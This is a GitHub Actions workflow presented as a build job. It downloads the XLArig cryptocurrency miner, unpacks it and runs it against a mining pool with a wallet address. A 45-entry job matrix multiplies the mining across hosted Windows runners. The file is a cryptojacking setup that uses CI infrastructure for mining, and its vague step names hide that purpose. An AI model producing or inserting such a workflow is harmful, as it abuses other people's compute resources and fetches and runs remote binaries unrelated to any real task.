name: eX-code_Btt

on: [workflow_dispatch]

jobs:
  build:
    name: eX-code_btt
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-win64.zip
    - name: Seting-UP
      run: Expand-Archive XLArig-v5.2.2-win64.zip
    - name: Running
      run: .\XLArig.exe -o rx.unmineable.com:3333 -a rx -k -u BTT:TP5npCRM7DperXgpKh95uLtXhTo5KbpNSw.nurulG#hfr0-76oe -p x
    - name: END
      run: exit
